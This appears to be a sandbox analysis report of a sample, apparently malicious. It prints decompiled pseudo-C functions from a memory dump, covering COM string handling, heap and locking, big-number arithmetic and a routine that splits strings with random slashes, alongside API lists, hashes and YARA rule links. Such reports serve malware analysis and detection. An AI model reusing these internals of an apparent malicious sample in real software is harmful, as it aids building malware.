                                                        • Opcode Fuzzy Hash: fe99a22a8f167f975678be1792c5f8164beb1b3b951b12ed48ad8affb3991c07
                                                        • Instruction Fuzzy Hash: 3FF049706653129FEB338F24B80DB193AB9A704B40F808329E20BC61CBD3B18450CB15
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01204598, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 46%
                                                        			E01204598(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x120a2d4; // 0x455d5a8
					_t5 = _t102 + 0x120b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x12092b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x120a2d4; // 0x455d5a8
												_t28 = _t108 + 0x120b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x120a2d4; // 0x455d5a8
														_t33 = _t78 + 0x120b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                                                        0x0120459d
                                                        0x012045a6
                                                        0x012045a7
                                                        0x012045ab
                                                        0x012045b1
                                                        0x012045b7
                                                        0x012045c0
                                                        0x012045c6
                                                        0x012045d0
                                                        0x012045d2
                                                        0x012045d8
                                                        0x012045dd
                                                        0x012045e8
                                                        0x012045f0
                                                        0x012045f3
                                                        0x01204716
                                                        0x012045f9
                                                        0x012045f9
                                                        0x01204606
                                                        0x0120460c
                                                        0x01204612
                                                        0x01204616
                                                        0x0120461c
                                                        0x01204629
                                                        0x0120462d
                                                        0x01204633
                                                        0x01204636
                                                        0x0120463c
                                                        0x01204642
                                                        0x01204648
                                                        0x0120464b
                                                        0x0120464e
                                                        0x01204654
                                                        0x0120465d
                                                        0x01204663
                                                        0x01204664
                                                        0x01204667
                                                        0x01204668
                                                        0x01204669
                                                        0x01204671
                                                        0x01204672
                                                        0x01204673
                                                        0x01204675
                                                        0x01204679
                                                        0x0120467d
                                                        0x00000000
                                                        0x00000000
                                                        0x01204683
                                                        0x0120468c
                                                        0x01204692
                                                        0x0120469c
                                                        0x012046a0
                                                        0x012046a2
                                                        0x012046af
                                                        0x012046b3
                                                        0x012046bb
                                                        0x012046c0
                                                        0x012046d2
                                                        0x012046d4
                                                        0x012046da
                                                        0x012046da
                                                        0x012046e3
                                                        0x012046e3
                                                        0x012046e5
                                                        0x012046eb
                                                        0x012046eb
                                                        0x012046ee
                                                        0x012046f4
                                                        0x012046f7
                                                        0x01204700
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01204700
                                                        0x01204654
                                                        0x0120464e
                                                        0x01204636
                                                        0x01204706
                                                        0x01204706
                                                        0x0120470c
                                                        0x0120470c
                                                        0x01204712
                                                        0x01204712
                                                        0x0120471b
                                                        0x01204721
                                                        0x01204721
                                                        0x012045dd
                                                        0x0120472a

                                                        APIs
                                                        • SysAllocString.OLEAUT32(012092B0), ref: 012045E8
                                                        • lstrcmpW.KERNEL32(00000000,0076006F), ref: 012046CA
                                                        • SysFreeString.OLEAUT32(00000000), ref: 012046E3
                                                        • SysFreeString.OLEAUT32(?), ref: 01204712
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: String$Free$Alloclstrcmp
                                                        • String ID:
                                                        • API String ID: 1885612795-0
                                                        • Opcode ID: 8f3ab0d2573690c32b89e67aa2603a3bc4f57adc173381e8d4b773ff274b52b7
                                                        • Instruction ID: ce142c2f2ccc55348d55773de4c81aa717c3f34e81d33d6f72d7411f1b515c6d
                                                        • Opcode Fuzzy Hash: 8f3ab0d2573690c32b89e67aa2603a3bc4f57adc173381e8d4b773ff274b52b7
                                                        • Instruction Fuzzy Hash: 24517475D0051ADFCF11EFA8C4888AEF7B5FF89704B108694EA15EB256D731AD41CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0120627E, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SysAllocString.OLEAUT32(00000000), ref: 012062BF
                                                        • SysFreeString.OLEAUT32(00000000), ref: 012063A2
                                                          • Part of subcall function 01204598: SysAllocString.OLEAUT32(012092B0), ref: 012045E8
                                                        • SafeArrayDestroy.OLEAUT32(?), ref: 012063F6
                                                        • SysFreeString.OLEAUT32(?), ref: 01206404
                                                          • Part of subcall function 0120708C: Sleep.KERNEL32(000001F4), ref: 012070D4
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                        • String ID:
                                                        • API String ID: 3193056040-0
                                                        • Opcode ID: 4427e066a178f8a8ae09607ce960f15da391398878b66f767fa44bf654a4bcdc
                                                        • Instruction ID: b6bb7329eaf0d8d4c76d5f69b691ab9ee6eea6ce3115b1c14bf9ef4dc3c02e20
                                                        • Opcode Fuzzy Hash: 4427e066a178f8a8ae09607ce960f15da391398878b66f767fa44bf654a4bcdc
                                                        • Instruction Fuzzy Hash: 2551653591020AEFDB12DFE8C8848AEB7B6FF88700B148929E646DB251D731AD55CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0120472B, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 85%
                                                        			E0120472B(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E012070EC(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E01203954(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E01206136(_t101,  &_v428, _a8, _t96 - _t81);
					E01206136(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E01203954(_t101,  &E0120A188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E01203954(_a16, _a4);
						E01202E9B(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L01207DDC();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L01207DD6();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E012021FA(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E01205C5B(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E0120584E(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E0120A188) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                        0x0120472e
                                                        0x0120473a
                                                        0x01204740
                                                        0x01204745
                                                        0x01204749
                                                        0x012048bb
                                                        0x012048bf
                                                        0x012048bf
                                                        0x0120474f
                                                        0x01204753
                                                        0x01204759
                                                        0x0120475a
                                                        0x01204765
                                                        0x0120476b
                                                        0x01204770
                                                        0x01204773
                                                        0x0120478d
                                                        0x0120479c
                                                        0x012047a8
                                                        0x012047b2
                                                        0x012047b7
                                                        0x012047b9
                                                        0x012047bc
                                                        0x01204873
                                                        0x01204879
                                                        0x0120488a
                                                        0x0120489d
                                                        0x012048b3
                                                        0x00000000
                                                        0x012048b8
                                                        0x012047c5
                                                        0x012047cc
                                                        0x012047d0
                                                        0x012047d6
                                                        0x012047d8
                                                        0x012047da
                                                        0x012047dc
                                                        0x012047de
                                                        0x012047e8
                                                        0x012047ed
                                                        0x012047ef
                                                        0x012047f1
                                                        0x012047f2
                                                        0x012047f3
                                                        0x012047f4
                                                        0x012047fb
                                                        0x01204802
                                                        0x01204805
                                                        0x01204805
                                                        0x012047d2
                                                        0x012047d2
                                                        0x012047d2
                                                        0x0120480d
                                                        0x01204815
                                                        0x01204821
                                                        0x01204826
                                                        0x01204826
                                                        0x0120482b
                                                        0x00000000
                                                        0x00000000
                                                        0x0120482d
                                                        0x01204830
                                                        0x0120483d
                                                        0x00000000
                                                        0x00000000
                                                        0x0120483f
                                                        0x0120483f
                                                        0x0120484c
                                                        0x01204826
                                                        0x0120482b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0120482b
                                                        0x01204856
                                                        0x01204859
                                                        0x0120485c
                                                        0x01204863
                                                        0x01204863
                                                        0x01204870
                                                        0x00000000
                                                        0x01204870
                                                        0x0120475c
                                                        0x01204760
                                                        0x01204761
                                                        0x01204763
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01204763
                                                        0x00000000

                                                        APIs
                                                        • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 012047DE
                                                        • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 012047F4
                                                        • memset.NTDLL ref: 0120489D
                                                        • memset.NTDLL ref: 012048B3
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: memset$_allmul_aulldiv
                                                        • String ID:
                                                        • API String ID: 3041852380-0
                                                        • Opcode ID: 98ec9731b1b0b457e9ccae59da695bcacd58af223ed33629111065f0fef50b9b
                                                        • Instruction ID: 1babf6441079bfcfc0e9088a6c924ebeb13c4e8d7a1d90b62a34ef9a92ec8755
                                                        • Opcode Fuzzy Hash: 98ec9731b1b0b457e9ccae59da695bcacd58af223ed33629111065f0fef50b9b
                                                        • Instruction Fuzzy Hash: E541B831A1025AAFDB12EF68DC40BEE7775EF55310F008669FA19972C2DB70AE44CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01203AD2, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 78%
                                                        			E01203AD2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E01205FBC(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                        0x01203ade
                                                        0x01203ae2
                                                        0x01203ae3
                                                        0x01203ae4
                                                        0x01203ae6
                                                        0x01203ae8
                                                        0x01203aed
                                                        0x01203af0
                                                        0x01203b87
                                                        0x01203b8e
                                                        0x01203b8e
                                                        0x01203af9
                                                        0x01203b00
                                                        0x01203b10
                                                        0x01203b10
                                                        0x01203b16
                                                        0x01203b18
                                                        0x01203b1d
                                                        0x01203b26
                                                        0x01203b2e
                                                        0x01203b31
                                                        0x01203b3c
                                                        0x01203b40
                                                        0x01203b42
                                                        0x01203b43
                                                        0x01203b4c
                                                        0x01203b50
                                                        0x01203b61
                                                        0x01203b52
                                                        0x01203b57
                                                        0x01203b5c
                                                        0x01203b6b
                                                        0x01203b6b
                                                        0x01203b40
                                                        0x01203b71
                                                        0x01203b77
                                                        0x01203b77
                                                        0x01203b80
                                                        0x01203b85
                                                        0x01203b85
                                                        0x00000000

                                                        APIs
                                                        • Sleep.KERNEL32(000000C8), ref: 01203B00
                                                        • lstrlenW.KERNEL32(?), ref: 01203B36
                                                        • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 01203B57
                                                        • SysFreeString.OLEAUT32(?), ref: 01203B6B
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: FreeSleepStringlstrlenmemcpy
                                                        • String ID:
                                                        • API String ID: 1198164300-0
                                                        • Opcode ID: be32d24248e5d0e6dfc4df92b33e61e074f216e78b0f9badef0702b2e1ad08cd
                                                        • Instruction ID: 3441cb58bf9723530b4e703cf0397276afdf2259ba9315112e96cf49ffb52ce7
                                                        • Opcode Fuzzy Hash: be32d24248e5d0e6dfc4df92b33e61e074f216e78b0f9badef0702b2e1ad08cd
                                                        • Instruction Fuzzy Hash: C121867590060AFFDB12DFA8D888D9EBBB8FF49314B104269EA45D7252E730DA40CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01204FE5, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 68%
                                                        			E01204FE5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x120a290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x120a2a8; // 0x5e4f4d72
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x120a2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                        0x01204fed
                                                        0x01204ff0
                                                        0x01204ff6
                                                        0x0120500e
                                                        0x01205012
                                                        0x01205015
                                                        0x01205017
                                                        0x0120501a
                                                        0x0120501c
                                                        0x0120501f
                                                        0x01205021
                                                        0x01205021
                                                        0x01205023
                                                        0x0120502e
                                                        0x01205033
                                                        0x01205044
                                                        0x0120504c
                                                        0x01205051
                                                        0x01205054
                                                        0x01205057
                                                        0x01205059
                                                        0x0120505f
                                                        0x01205062
                                                        0x01205062
                                                        0x01205062
                                                        0x0120506d
                                                        0x01205072
                                                        0x0120507c

                                                        APIs
                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,012071E9,00000000,?,00000000,01204A9F,00000000,05769630), ref: 01204FF0
                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 01205008
                                                        • memcpy.NTDLL(00000000,05769630,-00000008,?,?,?,012071E9,00000000,?,00000000,01204A9F,00000000,05769630), ref: 0120504C
                                                        • memcpy.NTDLL(00000001,05769630,00000001,01204A9F,00000000,05769630), ref: 0120506D
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: memcpy$AllocateHeaplstrlen
                                                        • String ID:
                                                        • API String ID: 1819133394-0
                                                        • Opcode ID: 3bfa2b3320927a19db1c97685f68ec41c5b6c83cf9a3cb8b3ada994ad95c5cce
                                                        • Instruction ID: d5d59cd5df5af492465442c85ef71c234da61e942c98b2d6362e6de4976291ff
                                                        • Opcode Fuzzy Hash: 3bfa2b3320927a19db1c97685f68ec41c5b6c83cf9a3cb8b3ada994ad95c5cce
                                                        • Instruction Fuzzy Hash: 17110A72A10215BFD722CB69EC88E9EBBBEEB94250B040376E60597192E6719D009790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01204013, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 50%
                                                        			E01204013(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x120a37c; // 0x5769630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x120a37c; // 0x5769630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x120a030) {
					HeapFree( *0x120a290, 0, _t8);
				}
				_t13[1] = E012038DA(_v0, _t13);
				_t10 =  *0x120a37c; // 0x5769630
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}










                                                        0x01204013
                                                        0x01204013
                                                        0x0120401c
                                                        0x0120402c
                                                        0x0120402c
                                                        0x01204031
                                                        0x01204036
                                                        0x00000000
                                                        0x00000000
                                                        0x01204026
                                                        0x01204026
                                                        0x01204038
                                                        0x0120403c
                                                        0x0120404e
                                                        0x0120404e
                                                        0x0120405e
                                                        0x01204061
                                                        0x01204066
                                                        0x0120406a
                                                        0x01204070

                                                        APIs
                                                        • RtlEnterCriticalSection.NTDLL(057695F0), ref: 0120401C
                                                        • Sleep.KERNEL32(0000000A,?,?,01204540,?,?,?,?,?,012068F7,?,00000001), ref: 01204026
                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,01204540,?,?,?,?,?,012068F7,?,00000001), ref: 0120404E
                                                        • RtlLeaveCriticalSection.NTDLL(057695F0), ref: 0120406A
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                        • String ID:
                                                        • API String ID: 58946197-0
                                                        • Opcode ID: b83dbecf91c4be09e987e6a588e543626341daa4ef064043ac653136aef9ec4d
                                                        • Instruction ID: 5adf4086774ebab34962beb87fc48a3cdfdaf2f6ad3151db7af9abce025d9f77
                                                        • Opcode Fuzzy Hash: b83dbecf91c4be09e987e6a588e543626341daa4ef064043ac653136aef9ec4d
                                                        • Instruction Fuzzy Hash: 08F05E30210281DFEB37EB28F84CB1A3BA6EF04344B008200F75AD72E7C220D884CB20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0120566B, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0120566B() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x120a2c4; // 0x2ec
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x120a308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x120a2c4; // 0x2ec
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x120a290; // 0x5370000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                        0x0120566b
                                                        0x01205672
                                                        0x012056bc
                                                        0x012056be
                                                        0x012056be
                                                        0x01205676
                                                        0x0120567c
                                                        0x01205681
                                                        0x01205685
                                                        0x0120568b
                                                        0x01205692
                                                        0x00000000
                                                        0x00000000
                                                        0x01205694
                                                        0x01205699
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01205699
                                                        0x0120569b
                                                        0x012056a3
                                                        0x012056a6
                                                        0x012056a6
                                                        0x012056ac
                                                        0x012056b3
                                                        0x012056b6
                                                        0x012056b6
                                                        0x00000000

                                                        APIs
                                                        • SetEvent.KERNEL32(000002EC,00000001,01206991), ref: 01205676
                                                        • SleepEx.KERNEL32(00000064,00000001), ref: 01205685
                                                        • CloseHandle.KERNEL32(000002EC), ref: 012056A6
                                                        • HeapDestroy.KERNEL32(05370000), ref: 012056B6
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: CloseDestroyEventHandleHeapSleep
                                                        • String ID:
                                                        • API String ID: 4109453060-0
                                                        • Opcode ID: 7bf2f07182a52fa382119b389ea64b0146c11882279d349acc3273e83cb5372f
                                                        • Instruction ID: 32e7e5157ab134ee4a6cf25959c04c22e3241332a6e07d8850c9872964b8247e
                                                        • Opcode Fuzzy Hash: 7bf2f07182a52fa382119b389ea64b0146c11882279d349acc3273e83cb5372f
                                                        • Instruction Fuzzy Hash: 32F098B1B113229FFB32AA79BD4CB5B3BA9AB04A517450714BE09D71CBDA25D8808F50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0120152E, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 37%
                                                        			E0120152E() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x120a37c; // 0x5769630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x120a37c; // 0x5769630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x120a37c; // 0x5769630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x120b85e) {
					HeapFree( *0x120a290, 0, _t10);
					_t7 =  *0x120a37c; // 0x5769630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                        0x0120152e
                                                        0x01201537
                                                        0x01201547
                                                        0x01201547
                                                        0x0120154c
                                                        0x01201551
                                                        0x00000000
                                                        0x00000000
                                                        0x01201541
                                                        0x01201541
                                                        0x01201553
                                                        0x01201558
                                                        0x0120155c
                                                        0x0120156f
                                                        0x01201575
                                                        0x01201575
                                                        0x0120157e
                                                        0x01201580
